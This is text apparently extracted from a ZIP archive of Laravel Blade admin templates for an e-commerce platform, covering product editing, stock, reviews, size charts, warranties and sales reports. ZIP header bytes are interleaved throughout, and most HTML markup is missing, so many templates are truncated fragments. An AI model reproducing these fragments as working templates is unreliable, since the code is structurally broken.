    {{translate('Generate')}}
    @endif
    {{translate('SEO Meta Tags')}}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{translate('Product Price & Stock')}}
    {{----}}
    {{translate('Product Variation Configuration')}}

    {{ translate('Choose the attributes of this product and then input values of each attribute') }}


    {{ translate('Product Settings') }}
    {{ translate('Published') }}
    {{ translate('Featured') }}
    {{ translate('Todays Deal') }}
    @if (addon_is_activated('refund_request'))
    {{ translate('Refund') }}
    {{ translate('Refundable') }}
    {{translate('Note (Add from preset)')}}
    @endif @if(addon_is_activated('club_point'))
    {{translate('Clubpoint') }}
    @endif
    {{translate('Warranty') }}
    {{translate('Enable warranty for this product') }}
    Notes (Add from Preset)
    {{ translate('Shipping') }}
    {{ translate('Shipping Configuration') }}
    @if (get_setting('shipping_type') == 'product_wise_shipping')
    {{ translate('Free Shipping') }}
    {{ translate('Flat Rate') }}
    {{ translate('Is Product Quantity Multiply') }}
    @else

    {{ translate('Product wise shipping cost is disable. Shipping cost is configured from here') }} {{translate('Shipping Method')}}

    @endif
    {{ translate('Estimated Shipping Time') }}
    {{ translate('Days') }}
    Notes (Add from Preset)
    {{ translate('Cash On Delivery') }}
    @if (get_setting('cash_payment') == '1')
    {{ translate('Cash on delivery available') }}
    {{ translate('Notes (Add from Preset)') }}
    @else

    {{ translate('Cash On Delivery option is disabled. Activate this feature from here') }} {{translate('Cash Payment Activation')}}

    @endif
    @if (addon_is_activated('gst_system'))
    {{translate('HSN & GST')}}
    @else
    {{translate('Vat & TAX')}}
    @foreach(\App\Models\Tax::where('tax_status', 1)->get() as $tax)
    @endforeach
    @endif
    {{translate('Stock & Order Display Settings')}}
    {{translate('Hide Stock Visibility State')}}
    {{translate('Show Stock Quantity')}}
    {{translate('Show Stock With Text Only')}}
    {{ translate('Low Stock Quantity Warning')}}
    {{ translate('Quantity')}}
    {{translate('Frequently Bought')}}
    {{-- Select Category for Frequently Bought Product --}}
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @include('modals.products_select_modal') @include('modals.loading_modal') @endsection @section('script') @include('partials.product.product_temp_data') @endsection PK�N]�T�!����-views/backend/product/products/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Edit Product') }}

    @csrf
    {{translate('Product Basic Information')}}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    @php function renderSingleCategoryOptions($categories, $selectedId = null, $level = 0) { foreach ($categories as $category) { $indent = str_repeat('   ', $level); $selected = ($selectedId == $category->id) ? 'selected' : ''; echo ""; if ($category->childrenCategories && $category->childrenCategories->count() > 0) { renderSingleCategoryOptions($category->childrenCategories, $selectedId, $level + 1); } } } function renderMultiCategoryOptions($categories, $selectedIds = [], $level = 0) { foreach ($categories as $category) { $indent = str_repeat('   ', $level); $selected = (is_array($selectedIds) && in_array($category->id, $selectedIds)) ? 'selected' : ''; echo ""; if ($category->childrenCategories && $category->childrenCategories->count() > 0) { renderMultiCategoryOptions($category->childrenCategories, $selectedIds, $level + 1); } } } @endphp
    {{translate('Product Configuration')}}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    {{ translate('This is used for search. Input those words by which cutomer can find this product.') }}
    {{translate('Files & Media') }}
    generate Icon
    generate Icon
    ' data-target=".video-provider-link"> {{ translate('Add Another') }}
    generate Icon
    generate Icon
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{translate('Product Description') }}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    {{translate('SEO Meta Tags')}}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{translate('Product Price & Stock')}}
    {{translate('Product Variation Configuration')}}

    {{ translate('Choose the attributes of this product and then input values of each attribute') }}


    @foreach (json_decode($product->choice_options) as $key => $choice_option)
    @endforeach
    @php $start_date = date('d-m-Y H:i:s', $product->discount_start_date); $end_date = date('d-m-Y H:i:s', $product->discount_end_date); @endphp discount_start_date && $product->discount_end_date) value="{{ $start_date.' to '.$end_date }}" @endif>
    {{ translate('Product Variants') }}
    {{ translate('Product Settings') }}
    {{ translate('Published') }}
    {{ translate('Featured') }}
    {{ translate('Todays Deal') }}
    @php $productFlashDealId = $product->flash_deal_products->last()->flash_deal_id ?? null; @endphp
    @if (addon_is_activated('refund_request'))
    {{ translate('Refund') }}
    {{ translate('Refundable') }}
    {{translate('Note (Add from preset)')}}
    @if($product->refundNote != null)
    {{ $product->refundNote->getTranslation('description') ?? '' }}
    @endif
    @endif @if(addon_is_activated('club_point'))
    {{translate('Clubpoint') }}
    @endif
    {{translate('Warranty') }}
    {{translate('Enable warranty for this product') }}
    {{translate('Notes (Add from Preset)')}}
    {{ translate('Shipping') }}
    {{ translate('Shipping Configuration') }}
    @if (get_setting('shipping_type') == 'product_wise_shipping')
    {{ translate('Free Shipping') }}
    {{ translate('Flat Rate') }}
    shipping_type != 'flat_rate') style="display: none" @endif>
    {{ translate('Is Product Quantity Multiply') }}
    @else

    {{ translate('Product wise shipping cost is disable. Shipping cost is configured from here') }} {{translate('Shipping Method')}}

    @endif
    {{ translate('Estimated Shipping Time') }}
    Days
    {{translate('Notes (Add from Preset)')}}
    {{ translate('Cash On Delivery') }}
    @if (get_setting('cash_payment') == '1')
    {{ translate('Cash on delivery available') }}
    {{ translate('Notes (Add from Preset)') }}
    @else

    {{ translate('Cash On Delivery option is disabled. Activate this feature from here') }} {{translate('Cash Payment Activation')}}

    @endif
    @if (addon_is_activated('gst_system'))
    {{translate('HSN & GST')}}
    @else
    {{translate('Vat & TAX')}}
    @foreach(\App\Models\Tax::where('tax_status', 1)->get() as $tax) @php $tax_amount = 0; $tax_type = ''; foreach($tax->product_taxes as $row) { if($product->id == $row->product_id) { $tax_amount = $row->tax; $tax_type = $row->tax_type; } } @endphp
    @endforeach
    @endif
    {{translate('Stock & Order Display Settings')}}
    {{translate('Hide Stock Visibility State')}}
    {{translate('Show Stock Quantity')}}
    {{translate('Show Stock With Text Only')}}
    {{ translate('Low Stock Quantity Warning')}}
    {{ translate('Quantity')}}
    {{translate('Frequently Bought')}}
    frequently_bought_selection_type == 'product') checked @endif >
    frequently_bought_selection_type == 'category') checked @endif >
    @php $fq_bought_products = $product->frequently_bought_products()->where('category_id', null)->get(); @endphp
    @if(count($fq_bought_products) > 0)
    @foreach($fq_bought_products as $fQBproduct) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $fQBproduct->frequently_bought_product->getTranslation('name') }}

    {{ $fQBproduct->frequently_bought_product->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{-- Select Category for Frequently Bought Product --}}
    @php $fq_bought_product_category_id = $product->frequently_bought_products()->where('category_id','!=', null)->first(); $fqCategory = $fq_bought_product_category_id != null ? $fq_bought_product_category_id->category_id : null; @endphp
    @if ($product->draft) @else @endif
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @include('modals.loading_modal') @endsection @section('script') @endsectionPK�N]�זz[�[�.views/backend/product/products/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    @if(isset($back_to) && $back_to== 'brands') {{translate('Back to Brands')}} @elseif(isset($back_to) && $back_to== 'categories') {{translate('Back to Categories')}} @else

    {{ translate('All products') }}

    @endif
    @if ($seller_type != 'seller' && auth()->user()->can('add_new_product')) {{ translate('Add New Product') }} @endif
    @if($seller_type == 'seller')
    @endif
    @endsection @section('modal') @include('modals.loading_modal')
    @endsection @section('script') @endsection PK�N]���~GYGY7views/backend/product/products/products_table.blade.phpnu�[���
    @if (auth()->user()->can('product_delete')) @else @endif @if($ptoduct_type != 'pos_product_list') @if (get_setting('product_approve_by_admin') == 1 && $type == 'seller') @endif @endif @forelse ($products as $key => $product) @if($ptoduct_type != 'pos_product_list') @if (get_setting('product_approve_by_admin') == 1 && $type == 'seller') @endif @endif @empty @endforelse
    #{{ translate('Thumb') }} {{ translate('Name / Brand') }} {{ translate('Owner / Category') }} {{ translate('Ratings') }} {{ translate('Price Details') }} {{ translate('Info') }} {{ translate('Published') }}{{ translate('Approved') }}{{ translate('Featured') }} {{ translate('Todays Deal') }}{{ translate('Options') }}
    @if (auth()->user()->can('product_delete'))
    @else
    {{ $key + 1 + ($products->currentPage() - 1) * $products->perPage() }}
    @endif
    Image
    {{ $product->getTranslation('name') }} @if(isset($product->brand->name)) {{ translate($product->brand->name) }} @else {{ translate('No Brand') }} @endif
    @php $shop = optional(optional($product->user)->shop); @endphp {{ $shop->name ?? translate('Inhouse') }} {{ translate('Main Category') }}

    {{translate($product->main_category->name ?? '')}}

    {{ renderStarRatingLatest($product->rating) }}

    {{ $product->rating }}{{ translate('out of') }} 5.0

    @php $total = 0; $total += $product->reviews->where('status', 1)->count(); @endphp

    {{ $total }}{{translate('Reviews') }}

    {{ translate('Price') }}

    {{ single_price($product->unit_price) }}

    @if (discount_in_percentage($product) > 0)

    {{ translate('Discount') }} {{ discount_in_percentage($product) }}%

    @endif
    {{('Number of Sale')}}

    {{ $product->num_of_sale }}

    @if(!$product->draft && !$product->digital) {{translate('View Stock')}} @endif
    @if (!$product->draft) @endif @if (!$product->draft) @endif @if (!$product->draft) @endif @if (!$product->draft) @endif
    {{ translate('No Products found!') }}
    PK�N]�ggɃ�3views/backend/product/products/show_stock.blade.phpnu�[���
    {{ $product->getTranslation('name') }} @php $qty = 0; if($product->variant_product) { foreach ($product->stocks as $key => $stock) { $qty += $stock->qty; } } else { $qty = optional($product->stocks->first())->qty; } @endphp @if($qty <= $product->low_stock_quantity) {{ translate('Low') }} @endif
    @if($product->variant_product) @foreach ($product->stocks as $stock) @endforeach @else @endif
    Variant Stock Price
    {{ $stock->variant }} {{ $stock->qty }} {{ $stock->price }}
    {{ translate('Stock') }} {{ translate('Price') }}
    {{ $qty }} {{ $product->unit_price }}
    PK�N]dM��  9views/backend/product/products/sku_combinations.blade.phpnu�[���@if(count($combinations) > 0) @foreach ($combinations as $key => $combination) @php $sku = ''; foreach (explode(' ', $product_name) as $key => $value) { $sku .= substr($value, 0, 1); } $str = ''; foreach ($combination as $key => $item){ if($key > 0 ){ $str .= '-'.str_replace(' ', '', $item); $sku .='-'.str_replace(' ', '', $item); } else{ if($colors_active == 1){ $color_name = \App\Models\Color::where('code', $item)->first()->name; $str .= $color_name; $sku .='-'.$color_name; } else{ $str .= str_replace(' ', '', $item); $sku .='-'.str_replace(' ', '', $item); } } } @endphp @if(strlen($str) > 0) @endif @endforeach
    {{translate('Variant')}} {{translate('Variant Price')}} {{translate('SKU')}} {{translate('Quantity')}} {{translate('Photo')}}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endif PK�N]��2�-->views/backend/product/products/sku_combinations_edit.blade.phpnu�[���@if(count($combinations) > 0) @foreach ($combinations as $key => $combination) @php $variation_available = false; $sku = ''; foreach (explode(' ', $product_name) as $key => $value) { $sku .= substr($value, 0, 1); } $str = ''; foreach ($combination as $key => $item){ if($key > 0 ) { $str .= '-'.str_replace(' ', '', $item); $sku .='-'.str_replace(' ', '', $item); } else { if($colors_active == 1) { $color_name = \App\Models\Color::where('code', $item)->first()->name; $str .= $color_name; $sku .='-'.$color_name; } else { $str .= str_replace(' ', '', $item); $sku .='-'.str_replace(' ', '', $item); } } $stock = $product->stocks->where('variant', $str)->first(); // if($stock != null) { // $variation_available = true; // } } @endphp @if(strlen($str) > 0) @endif @endforeach
    {{translate('Variant')}} {{translate('Variant Price')}} {{translate('SKU')}} {{translate('Quantity')}} {{translate('Photo')}}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endif PK�N]O���@�@1views/backend/product/products/smartBar.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Smart Bar') }}
    @csrf
    ({{ translate('This bar will show a product summary at the bottom of the product detail page while scrolling.') }})
    @endsection @section('modal') @endsection @section('script') @endsectionPK�N]ϥN��Z�Z2views/backend/product/products/dashboard.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Product Management') }}

    {{ translate('Create, setup and manage all your products') }}
    {{ translate('PRODUCTS') }}
    @can('show_all_products') @endcan @can('show_in_house_products') @endcan @if(get_setting('vendor_system_activation') == 1) @can('show_seller_products') @endcan @endif @can('add_new_product') @endcan @can('add_digital_product') @endcan
    {{ translate('PRODUCT Setup') }}
    @can('view_product_categories') @endcan @can('view_all_brands') @endcan @can('view_measurement_points') @endcan @can('view_colors') @endcan @can('view_product_attributes') @endcan @can('view_size_charts') @endcan @can('view_product_warranties') @endcan @can('view_notes') @endcan
    {{ translate('PRODUCT operation') }}
    @can('view_product_reviews') @endcan @can('smart-bar') @endcan @can('view_custom_label') @endcan @can('product_bulk_import') @endcan @can('product_bulk_export') @endcan
    @endsection PK�N]�x�++<views/backend/product/reviews/create_custom_review.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Add New Custom Review')}}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate("If you do not use custom reviewer's image it will show default user image.")}}
    @if($product != null) @else @endif
    {{translate('Select Product for Custom Review')}}
    @if($product != null) @endif
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product review page gallery. Upload square images')}}
    @endsection @section('script') @endsectionPK�N]��kժ$�$6views/backend/product/reviews/detail_reviews.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Detail Reviews')}}

    @can('add_custom_review') @endcan

    Image
    {{ $product->getTranslation('name') }}

    {{ strtoupper(translate('Rating')) }}

    {{ $product->rating }}

    @for ($i=0; $i < $product->rating; $i++) @endfor @for ($i=0; $i < 5-$product->rating; $i++) @endfor


    @php $activeClasss = 'btn-soft-blue'; $inActiveClasses = 'text-secondary border-dashed border-soft-light'; @endphp {{ translate('Reviews').' ' }}({{ $customerReviewCount }}) {{ translate('Custom Reviews').' ' }}({{ $customReviewCount }})
    @if($reviewType == 'custom') @endif @foreach($reviews as $key => $review) @if($reviewType == 'custom') @endif @endforeach
    # {{ strtoupper(translate('Customer')) }} {{ strtoupper(translate('Rating')) }} {{ strtoupper(translate('Comment')) }} {{ strtoupper(translate('Published')) }}{{ strtoupper(translate('Options')) }}
    {{ ($key+1) + ($reviews->currentPage() - 1)*$reviews->perPage() }} @php $customerName = null; $customerAvatar = null; if($review->type == "real"){ if($review->user != null){ $customerName = $review->user->name; $customerAvatar = uploaded_asset($review->user->avatar_original); } else { $customerName = translate('Customer Not Found'); } } else{ $customerName = $review->custom_reviewer_name; $customerAvatar = uploaded_asset($review->custom_reviewer_image); } @endphp
    Image
    {{ $customerName }}
    {{ $review->rating }} {{ $review->comment }} @if($review->photos != null)
    @foreach (explode(',', $review->photos) as $photo) @endforeach
    @endif
    {{ date("j F, Y", strtotime($review->created_at)) }}
    @can('edit_custom_review') @endcan
    {{ $reviews->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]����%�%:views/backend/product/reviews/edit_custom_review.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Edit Custom Review')}}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate("If you do not use custom reviewer's image it will show default user image.")}}
    @if($review->created_at_is_custom == 0)
    created_at_is_custom == 0) checked @endif>
    created_at_is_custom == 1) checked @endif>
    @endif
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product review page gallery. Upload square images')}}
    @endsection @section('script') @endsectionPK�N]�$@G77Fviews/backend/product/reviews/get_review_product_by_category.blade.phpnu�[��� @foreach ($products as $product) @endforeach PK�N]��aa-views/backend/product/reviews/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Rating & Reviews')}}

    @can('add_custom_review') @endcan

    {{ translate('Product Review & Ratings') }}
    @foreach($products as $key => $product) @endforeach
    # {{translate('Product Name')}} {{translate('Product Owner')}} {{translate('Rating')}} {{translate('Reviews')}} {{translate('Custom Reviews')}} {{translate('Options')}}
    {{ ($key+1) + ($products->currentPage() - 1)*$products->perPage() }}
    Image
    {{ $product->getTranslation('name') }}
    {{ $product->user->name}} {{ $product->rating}} {{ $product->reviews->count()}} @if($product->reviews()->where('viewed',0)->count() > 0) {{ translate('new') }} @endif {{ $product->reviews->where('type','custom')->count()}}
    {{ $products->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]� �A111views/backend/product/sizeCharts/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Add New Size Chart') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('Size Chart Information') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product size gide beside size description.')}}
    {{translate('Size Configuration')}}
    {{translate('Size Combination')}}
    @endsection @section('script') @endsection PK�N]T��� 6 6/views/backend/product/sizeCharts/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Add New Size Chart') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('Size Chart Information') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product size gide beside size description.')}}
    {{translate('Size Configuration')}}
    {{translate('Size Combination')}}
    @include('backend.product.sizeCharts.size_combination_edit', ['size_chart' => $size_chart])
    @endsection @section('script') @endsection PK�N]�Bicc0views/backend/product/sizeCharts/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Size Chart')}}

    @can('add_size_charts') @endcan

    {{ translate('All Size Chart') }}
    @foreach($sizeCharts as $key => $sizeChart) @endforeach
    # {{ translate('Size Chart') }} {{ translate('Category') }} {{ translate('Details') }} {{ translate('Options') }}
    {{ ($key+1) + ($sizeCharts->currentPage() - 1)*$sizeCharts->perPage() }} {{ $sizeChart->name }} {{ $sizeChart->category ? $sizeChart->category->name : '' }} @can('edit_size_charts') @endcan @can('delete_size_charts') @endcan
    {{ $sizeCharts->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.size_chart_show_modal') @endsection @section('script') @endsection PK�N]k�J/views/backend/product/sizeCharts/show.blade.phpnu�[���@if ($size_chart->fit_type != null)

    {{ translate('Fit Type') }}: @if ($size_chart->fit_type == 'slim_fit') {{ translate('Slim Fit') }} @endif @if ($size_chart->fit_type == 'regular_fit') {{ translate('Regular Fit') }} @endif @if ($size_chart->fit_type == 'relaxed') {{ translate('Relaxed') }} @endif

    @endif @if ($size_chart->stretch_type != null)

    {{ translate('Stretch Type') }}: @if ($size_chart->stretch_type == 'non') {{ translate('Non') }} @endif @if ($size_chart->stretch_type == 'slight') {{ translate('Slight') }} @endif @if ($size_chart->stretch_type == 'medium') {{ translate('Medium') }} @endif @if ($size_chart->stretch_type == 'hign') {{ translate('Hign') }} @endif

    @endif
    @if($measurement_option_inch == 1 || $measurement_option_cen == 1) @endif
    @if($measurement_option_inch == 1)
    @foreach ($size_options as $size_option) @endforeach @foreach ($measurementPoints as $measurementPoint) @foreach ($size_options as $size_option) @endforeach @endforeach
    {{ translate('Measurement Points') }}{{ $size_option->value }}
    {{ $measurementPoint->name }} {{ $data['inch'][$measurementPoint->id][$size_option->id] }}
    @endif @if($measurement_option_cen == 1)
    @foreach ($size_options as $size_option) @endforeach @foreach ($measurementPoints as $measurementPoint) @foreach ($size_options as $size_option) @endforeach @endforeach
    {{ translate('Measurement Points') }}{{ $size_option->value }}
    {{ $measurementPoint->name }} {{ $data['cen'][$measurementPoint->id][$size_option->id] }}
    @endif
    @if ($size_chart->photos != null || $size_chart->description != null)
    {{ translate('Description') }}:
    @if ($size_chart->description != null)

    {!! nl2br($size_chart->description) !!}

    @endif @if ($size_chart->photos != null)
    @foreach (explode(",", $size_chart->photos) as $photo) @endforeach
    @endif
    @endifPK�N]~���aa;views/backend/product/sizeCharts/size_combination.blade.phpnu�[���@if($measurement_option_inch == 1 || $measurement_option_cen == 1) @foreach ($size_options as $size_option) @endforeach @foreach ($measurementPoints as $measurementPoint) @foreach ($size_options as $size_option) @endforeach @endforeach
    {{ translate('Measurement Points') }}{{ $size_option->value }}
    {{ $measurementPoint->name }} @if($measurement_option_inch == 1) @endif @if($measurement_option_cen == 1) @endif
    @endif PK�N]UZd�@views/backend/product/sizeCharts/size_combination_edit.blade.phpnu�[���@php $measurement_options = json_decode($size_chart->measurement_option); $measurement_option_inch = in_array("inch", $measurement_options) ? 1 : 0; $measurement_option_cen = in_array("cen", $measurement_options) ? 1 : 0; $measurementPoints = App\Models\MeasurementPoint::whereIn('id', json_decode($size_chart->measurement_points, true))->get(); $size_options = App\Models\AttributeValue::selectRaw('id,value')->whereIn('id', json_decode($size_chart->size_options, true))->get(); @endphp @if($measurement_option_inch == 1 || $measurement_option_cen == 1) @foreach ($size_options as $size_option) @endforeach @foreach ($measurementPoints as $measurementPoint) @foreach ($size_options as $size_option) @endforeach @endforeach
    {{ translate('Measurement Points') }}{{ $size_option->value }}
    {{ $measurementPoint->name }} @if($measurement_option_inch == 1) @endif @if($measurement_option_cen == 1) @endif
    @endif PK�N]SGϖ� � /views/backend/product/warranties/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Warrenty Information')}}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 40px width X 40px height.') }}
    @endsection PK�N]zN����0views/backend/product/warranties/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Warranties')}}

    {{ translate('Warranties') }}
    @foreach($warranties as $key => $warranty) @endforeach
    # {{translate('Warranty Text')}} {{translate('Logo')}} {{translate('Options')}}
    {{ ($key+1) + ($warranties->currentPage() - 1)*$warranties->perPage() }} {{ $warranty->getTranslation('text') }} {{translate('Warranty Logo')}} @can('edit_product_warranty') @endcan @can('delete_product_warranty') @endcan
    {{ $warranties->appends(request()->input())->links() }}
    @can('add_product_warranty')
    {{ translate('Add New Warranty') }}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 40px width X 40px height.') }}
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]ȿ!��9views/backend/reports/commission_history_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Commission History report')}}

    @include('backend.reports.partials.commission_history_section')
    @endsectionPK�N]��s����5views/backend/reports/earning_payout_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Earning Report') }}

    {{ single_price($total_sales_alltime) }}

    {{ translate('Total Sales Alltime') }}

    {{ translate('Sales this month') }}

    {{ single_price($sales_this_month) }}

    {{ single_price($total_payouts) }}

    {{ translate('Payouts') }}

    {{ translate('Payouts this month') }}

    {{ single_price($payout_this_month) }}

    {{ $total_categories }}

    {{ translate('Total Category') }}

    @foreach ($top_categories as $key => $top_category)
    @php $badge = 'badge-danger'; if ($key == 1) { $badge = 'badge-warning'; } if ($key == 2) { $badge = 'badge-primary'; } $lang = App::getLocale(); $category = App\Models\CategoryTranslation::where('category_id', $top_category->id) ->where('lang', $lang) ->first(); @endphp

    {{ $category ? $category->name : translate('Not Found') }}

    {{ single_price($top_category->total) }}

    @endforeach

    {{ $total_brands }}

    {{ translate('Total Brands') }}

    {{ translate('Top Brands') }}

    @foreach ($top_brands as $key => $top_brand)
    @php $badge = 'badge-success'; if ($key == 1) { $badge = 'badge-primary'; } if ($key == 2) { $badge = 'badge-info'; } $lang = App::getLocale(); $brand = App\Models\BrandTranslation::where('brand_id', $top_brand->id) ->where('lang', $lang) ->first(); @endphp

    {{ $brand ? $brand->name : translate('Not Found') }}

    {{ single_price($top_brand->total) }}

    @endforeach
    @endsection @section('script') @endsection PK�N]D�h;  4views/backend/reports/in_house_sale_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Inhouse Product sale report')}}

    @foreach ($products as $key => $product) @endforeach
    # {{ translate('Product Name') }} {{ translate('Num of Sale') }}
    {{ ($key+1) + ($products->currentPage() - 1)*$products->perPage() }} {{ $product->getTranslation('name') }} {{ $product->num_of_sale }}
    {{ $products->appends(request()->input())->links() }}
    @endsection PK�N]o�v� � Cviews/backend/reports/partials/commission_history_section.blade.phpnu�[���
    {{ translate('Commission History') }}
    @if(Auth::user()->user_type != 'seller')
    @endif
    @foreach ($commission_history as $key => $history) @endforeach
    # {{ translate('Order Code') }} {{ translate('Admin Commission') }} {{ translate('Seller Earning') }} {{ translate('Created At') }}
    {{ ($key+1) }} @if(isset($history->order)) {{ $history->order->code }} @if (addon_is_activated('pos_system') && $history->order->order_from == 'pos') {{ translate('POS') }} @endif @else {{ translate('Order Deleted') }} @endif {{ $history->admin_commission }} {{ $history->seller_earning }} {{ $history->created_at }}
    {{ $commission_history->appends(request()->input())->links() }}
    PK�N]�r[� � 2views/backend/reports/seller_sale_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Seller Based Selling Report')}}

    @foreach ($sellers as $key => $seller) @if($seller != null) @endif @endforeach
    {{ translate('Seller Name') }} {{ translate('Shop Name') }} {{ translate('Number of Product Sale') }} {{ translate('Order Amount') }}
    {{ $seller->user->name }} {{ $seller->name != null ? $seller->name : '--' }} @php $num_of_sale = 0; foreach ($seller->user->products as $key => $product) { $num_of_sale += $product->num_of_sale; } @endphp {{ $num_of_sale }} {{ single_price(\App\Models\OrderDetail::where('seller_id', $seller->user->id)->where('delivery_status', '!=', 'cancelled')->sum('price')) }}
    {{ $sellers->appends(request()->input())->links() }}
    @endsection PK�N]z1i�� � ,views/backend/reports/stock_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Product wise stock report')}}

    @foreach ($products as $key => $product) @php $qty = 0; foreach ($product->stocks as $key => $stock) { $qty += $stock->qty; } @endphp @endforeach
    {{ translate('Product Name') }} {{ translate('Stock') }}
    {{ $product->getTranslation('name') }} {{ $qty }}
    {{ $products->appends(request()->input())->links() }}
    @endsection PK�N]�5�BB2views/backend/reports/user_search_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('User Search Report')}}

    @foreach ($searches as $key => $searche) @endforeach
    # {{ translate('Search By') }} {{ translate('Number searches') }}
    {{ ($key+1) + ($searches->currentPage() - 1)*$searches->perPage() }} {{ $searche->query }} {{ $searche->count }}
    {{ $searches->links() }}
    @endsection PK�N]٧G���5views/backend/reports/wallet_history_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Wallet Transaction Report')}}

    {{ translate('Wallet Transaction') }}
    @if(Auth::user()->user_type != 'seller')
    @endif
    @foreach ($wallets as $key => $wallet) @if ($wallet->user != null) @else @endif @endforeach
    # {{ translate('Customer')}} {{ translate('Date') }} {{ translate('Amount')}} {{ translate('Payment Method')}} {{ translate('Approval')}}
    {{ $key+1 }}{{ $wallet->user->name }}{{ translate('User Not found') }}{{ date('d-m-Y', strtotime($wallet->created_at)) }} {{ single_price($wallet->amount) }} {{ ucfirst(str_replace('_', ' ', $wallet ->payment_method)) }} @if ($wallet->offline_payment) @if ($wallet->approval) {{translate('Approved')}} @else {{translate('Pending')}} @endif @else N/A @endif
    {{ $wallets->appends(request()->input())->links() }}
    @endsectionPK�N]`JM� � +views/backend/reports/wish_report.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Product Wish Report')}}

    @foreach ($products as $key => $product) @if($product->wishlists != null) @endif @endforeach
    {{ translate('Product Name') }} {{ translate('Number of Wish') }}
    {{ $product->getTranslation('name') }} {{ $product->wishlists->count() }}
    {{ $products->appends(request()->input())->links() }}
    @endsection PK�N]�9�q--.views/backend/reports/ai_token_usage.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Token Usage History') }}

    {{ $totalRequests }}

    {{ translate('Total Requests') }}

    {{ $totalTokens }}

    {{ translate('Total Tokens') }}

    {{ $avgPerRequest }}

    {{ translate('Avg Tokens/Request') }}

    @forelse ($logs as $key => $log) @empty @endforelse
    {{ translate('Date & Time') }} {{ translate('User') }} {{ translate('Model') }} {{ translate('Prompt Tokens') }} {{ translate('Completion Tokens') }} {{ translate('Total Tokens') }}
    {{ date('d M Y, h:i A', strtotime($log->created_at)) }}
    {{ optional($log->user)->name ?? 'System' }}
    {{ $log->model }} {{ number_format($log->prompt_tokens) }} {{ number_format($log->completion_tokens) }}

    {{ number_format($log->total_tokens) }}

    {{ translate('No AI Usage Logs found!') }}

    {{ translate('Start using AI features to see token usage here.') }}

    @if($logs->hasPages()) @endif
    @endsection @section('script') @endsectionPK�N]�:��?�?0views/backend/reports/google_analytics.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Google Analytics Dashboard') }}

    {{ $realtimeUsers }}

    {{ translate('Active Users Now') }}

    {{ $totals['activeUsers'] ?? 0 }}

    {{ translate('Total Active Users') }}

    {{ $totals['screenPageViews'] ?? 0 }}

    {{ translate('Page Views') }}

    {{ $realtimePerMinute }}/min

    {{ translate('Avg. Per Minute') }}

    {{ translate('Visitors & Page Views Trend') }}
    {{ translate('Realtime Activity') }}

    {{ $realtimeLast5Min }} {{ translate('users in last 5 min') }}

    {{ translate('Live')}}
    {{ translate('Top Browsers') }}
    @foreach($topBrowsers as $browser) @endforeach
    {{ translate('Browser') }} {{ translate('Views') }}
